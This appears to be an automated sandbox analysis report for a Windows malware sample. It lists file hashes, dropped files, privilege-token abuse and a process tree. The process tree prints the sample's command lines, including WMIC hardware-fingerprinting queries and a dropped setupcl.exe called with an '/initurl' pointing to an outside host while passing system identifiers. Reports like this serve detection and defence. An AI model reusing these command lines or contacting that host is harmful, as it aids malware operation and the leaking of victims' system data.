6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c

Analysis

max time kernel
46s
max time network
50s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
26-11-2022 22:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
Size

280KB
MD5

3bb5a24d45b029ada9d423eb6d8e8caa
SHA1

0f33f0e7595ca302ba8bf94c220b3013f5f3e894
SHA256

6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c
SHA512

7c08ce6bc14aa2a68b2d94e3530f57b576195812eb3ffb5d6b105f6ea443c4ef1eb4fc9ee7d630b0cfbac14db11f1b08d1259de933e5ea9e470380a4ede898c1
SSDEEP

6144:gso3mypIkejMVzTnrCqqWKbD/6HtK9rK1xJ5CN/LAu8Z:A33pIRjGTn3qWKPdkx3A+

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1116	UnRar.exe
1768	setupcl.exe

Loads dropped DLL 7 IoCs

pid	Process
1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1088	WMIC.exe
Token: SeSecurityPrivilege	1088	WMIC.exe
Token: SeTakeOwnershipPrivilege	1088	WMIC.exe
Token: SeLoadDriverPrivilege	1088	WMIC.exe
Token: SeSystemProfilePrivilege	1088	WMIC.exe
Token: SeSystemtimePrivilege	1088	WMIC.exe
Token: SeProfSingleProcessPrivilege	1088	WMIC.exe
Token: SeIncBasePriorityPrivilege	1088	WMIC.exe
Token: SeCreatePagefilePrivilege	1088	WMIC.exe
Token: SeBackupPrivilege	1088	WMIC.exe
Token: SeRestorePrivilege	1088	WMIC.exe
Token: SeShutdownPrivilege	1088	WMIC.exe
Token: SeDebugPrivilege	1088	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1088	WMIC.exe
Token: SeRemoteShutdownPrivilege	1088	WMIC.exe
Token: SeUndockPrivilege	1088	WMIC.exe
Token: SeManageVolumePrivilege	1088	WMIC.exe
Token: 33	1088	WMIC.exe
Token: 34	1088	WMIC.exe
Token: 35	1088	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1088	WMIC.exe
Token: SeSecurityPrivilege	1088	WMIC.exe
Token: SeTakeOwnershipPrivilege	1088	WMIC.exe
Token: SeLoadDriverPrivilege	1088	WMIC.exe
Token: SeSystemProfilePrivilege	1088	WMIC.exe
Token: SeSystemtimePrivilege	1088	WMIC.exe
Token: SeProfSingleProcessPrivilege	1088	WMIC.exe
Token: SeIncBasePriorityPrivilege	1088	WMIC.exe
Token: SeCreatePagefilePrivilege	1088	WMIC.exe
Token: SeBackupPrivilege	1088	WMIC.exe
Token: SeRestorePrivilege	1088	WMIC.exe
Token: SeShutdownPrivilege	1088	WMIC.exe
Token: SeDebugPrivilege	1088	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1088	WMIC.exe
Token: SeRemoteShutdownPrivilege	1088	WMIC.exe
Token: SeUndockPrivilege	1088	WMIC.exe
Token: SeManageVolumePrivilege	1088	WMIC.exe
Token: 33	1088	WMIC.exe
Token: 34	1088	WMIC.exe
Token: 35	1088	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1704	WMIC.exe
Token: SeSecurityPrivilege	1704	WMIC.exe
Token: SeTakeOwnershipPrivilege	1704	WMIC.exe
Token: SeLoadDriverPrivilege	1704	WMIC.exe
Token: SeSystemProfilePrivilege	1704	WMIC.exe
Token: SeSystemtimePrivilege	1704	WMIC.exe
Token: SeProfSingleProcessPrivilege	1704	WMIC.exe
Token: SeIncBasePriorityPrivilege	1704	WMIC.exe
Token: SeCreatePagefilePrivilege	1704	WMIC.exe
Token: SeBackupPrivilege	1704	WMIC.exe
Token: SeRestorePrivilege	1704	WMIC.exe
Token: SeShutdownPrivilege	1704	WMIC.exe
Token: SeDebugPrivilege	1704	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1704	WMIC.exe
Token: SeRemoteShutdownPrivilege	1704	WMIC.exe
Token: SeUndockPrivilege	1704	WMIC.exe
Token: SeManageVolumePrivilege	1704	WMIC.exe
Token: 33	1704	WMIC.exe
Token: 34	1704	WMIC.exe
Token: 35	1704	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1704	WMIC.exe
Token: SeSecurityPrivilege	1704	WMIC.exe
Token: SeTakeOwnershipPrivilege	1704	WMIC.exe
Token: SeLoadDriverPrivilege	1704	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1768	setupcl.exe
1768	setupcl.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 1444 wrote to memory of 1088	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	27
PID 1444 wrote to memory of 1088	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	27
PID 1444 wrote to memory of 1088	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	27
PID 1444 wrote to memory of 1088	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	27
PID 1444 wrote to memory of 1704	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	30
PID 1444 wrote to memory of 1704	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	30
PID 1444 wrote to memory of 1704	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	30
PID 1444 wrote to memory of 1704	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	30
PID 1444 wrote to memory of 1376	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	32
PID 1444 wrote to memory of 1376	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	32
PID 1444 wrote to memory of 1376	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	32
PID 1444 wrote to memory of 1376	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	32
PID 1444 wrote to memory of 1464	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	34
PID 1444 wrote to memory of 1464	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	34
PID 1444 wrote to memory of 1464	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	34
PID 1444 wrote to memory of 1464	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	34
PID 1444 wrote to memory of 1116	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	36
PID 1444 wrote to memory of 1116	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	36
PID 1444 wrote to memory of 1116	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	36
PID 1444 wrote to memory of 1116	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	36
PID 1444 wrote to memory of 1768	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	38
PID 1444 wrote to memory of 1768	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	38
PID 1444 wrote to memory of 1768	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	38
PID 1444 wrote to memory of 1768	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	38
PID 1444 wrote to memory of 1768	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	38
PID 1444 wrote to memory of 1768	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	38
PID 1444 wrote to memory of 1768	1444	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	38
PID 1768 wrote to memory of 1336	1768	setupcl.exe	39
PID 1768 wrote to memory of 1336	1768	setupcl.exe	39
PID 1768 wrote to memory of 1336	1768	setupcl.exe	39
PID 1768 wrote to memory of 1336	1768	setupcl.exe	39

C:\Users\Admin\AppData\Local\Temp\6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
"C:\Users\Admin\AppData\Local\Temp\6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1444
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1088
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1704
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get Version /FORMAT:textvaluelist.xsl
  2⤵
  PID:1376
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
  2⤵
  PID:1464
- C:\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\UnRar.exe
  UnRar.exe e -hp2014/03/22-14:03:26 [RANDOM_STRING].rar
  2⤵
  - Executes dropped EXE
  PID:1116
- C:\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\setupcl.exe
  "C:\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\setupcl.exe" /initurl http://sub.nuidal.info/init/6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c/:uid:? /affid "-" /id "0" /name " " /uniqid 6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c /uuid 00000000-0000-0000-0000-000000000000 /biosserial /biosversion ROCKS - 1 /csname Standard PC (Q35 + ICH9, 2009)
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    wmic bios get serialnumber, version
    3⤵
    PID:1336

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\UnRAR.exe

Filesize
302KB

MD5
d76c614a5810fdfaa611ee673c6737ed

SHA1
e1b49180eab5fac73ef8bd0af5c247534d2da414

SHA256
a6c0103ab6e07349c43b46ee1da62a0d74d40288427d23fd44faba75f5e275bf

SHA512
d0fc75ef754894e8704d090ed450c1e3f7513521abcc66d2b3e1cb126af00f4b25d24af2beb0595c6911a7dba53a51d0e4c271e34860e6902db84ebb61d4eaed

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\[RANDOM_STRING].rar

Filesize
85KB

MD5
dc61967a31f7bbe14c007d1f7edc8f81

SHA1
984a0338c18157f2efda2bff21c67d837b4c91c0

SHA256
b95bb8ecb5f5757886d4d7e3f3d44f9ad1478162f1070bf8372d725df730dd0f

SHA512
42f2afa842afe1c70ee27272f6e80e84a0d9466032eaafb67b77c32d79d08f8917302f531e501e137565a267b91eba0c5c6074b8648e0dac7f45bcbb96c3eee6

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\lq6eu80drbymikjcz

Filesize
8B

MD5
fd03887411dfd900c39337951e679b04

SHA1
42152a98048ce7705b7d41468fea303c30b7c28a

SHA256
526c508ecdc95803a98d14016d7299a88daa8b026096dc09e4f5692f5a794fd0

SHA512
69ed482297e2c3c0866e1292c2615de587b449559eb1fc3c2f0f30c65ed9a19c34018450d345ce0cd28feec6a5b26d1d4d4d1069f0f93fdedb396c7e5d62d3c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\setupcl.exe

Filesize
193KB

MD5
3417dd6b899f329136c955308b38e6d6

SHA1
1a1533dfc855c16bdcbfa03187d816818612b7ab

SHA256
f0ad091ca3a20bc9d90e1526f40d98ed86243d6c59e5af2c31301bc419732659

SHA512
82e0a51bc9f1914afd650b038742b5876e542d5a571b3aa26849c454148b8b1061218a4b0e718006c07e8ca87b37ca5ece3b52f2789d8304de08a122da5863ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\setupcl.exe

Filesize
193KB

MD5
3417dd6b899f329136c955308b38e6d6

SHA1
1a1533dfc855c16bdcbfa03187d816818612b7ab

SHA256
f0ad091ca3a20bc9d90e1526f40d98ed86243d6c59e5af2c31301bc419732659

SHA512
82e0a51bc9f1914afd650b038742b5876e542d5a571b3aa26849c454148b8b1061218a4b0e718006c07e8ca87b37ca5ece3b52f2789d8304de08a122da5863ba

Download Submit
\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\UnRAR.exe

Filesize
302KB

MD5
d76c614a5810fdfaa611ee673c6737ed

SHA1
e1b49180eab5fac73ef8bd0af5c247534d2da414

SHA256
a6c0103ab6e07349c43b46ee1da62a0d74d40288427d23fd44faba75f5e275bf

SHA512
d0fc75ef754894e8704d090ed450c1e3f7513521abcc66d2b3e1cb126af00f4b25d24af2beb0595c6911a7dba53a51d0e4c271e34860e6902db84ebb61d4eaed

Download Submit
\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
\Users\Admin\AppData\Local\Temp\nsyFA2A.tmp\setupcl.exe

Filesize
193KB

MD5
3417dd6b899f329136c955308b38e6d6

SHA1
1a1533dfc855c16bdcbfa03187d816818612b7ab

SHA256
f0ad091ca3a20bc9d90e1526f40d98ed86243d6c59e5af2c31301bc419732659

SHA512
82e0a51bc9f1914afd650b038742b5876e542d5a571b3aa26849c454148b8b1061218a4b0e718006c07e8ca87b37ca5ece3b52f2789d8304de08a122da5863ba

Download Submit
memory/1088-56-0x0000000000000000-mapping.dmp

Download
memory/1116-65-0x0000000000000000-mapping.dmp

Download
memory/1336-75-0x0000000000000000-mapping.dmp

Download
memory/1376-60-0x0000000000000000-mapping.dmp

Download
memory/1444-54-0x0000000075D71000-0x0000000075D73000-memory.dmp

Filesize
8KB

Download
memory/1464-62-0x0000000000000000-mapping.dmp

Download
memory/1704-58-0x0000000000000000-mapping.dmp

Download
memory/1768-71-0x0000000000000000-mapping.dmp

Download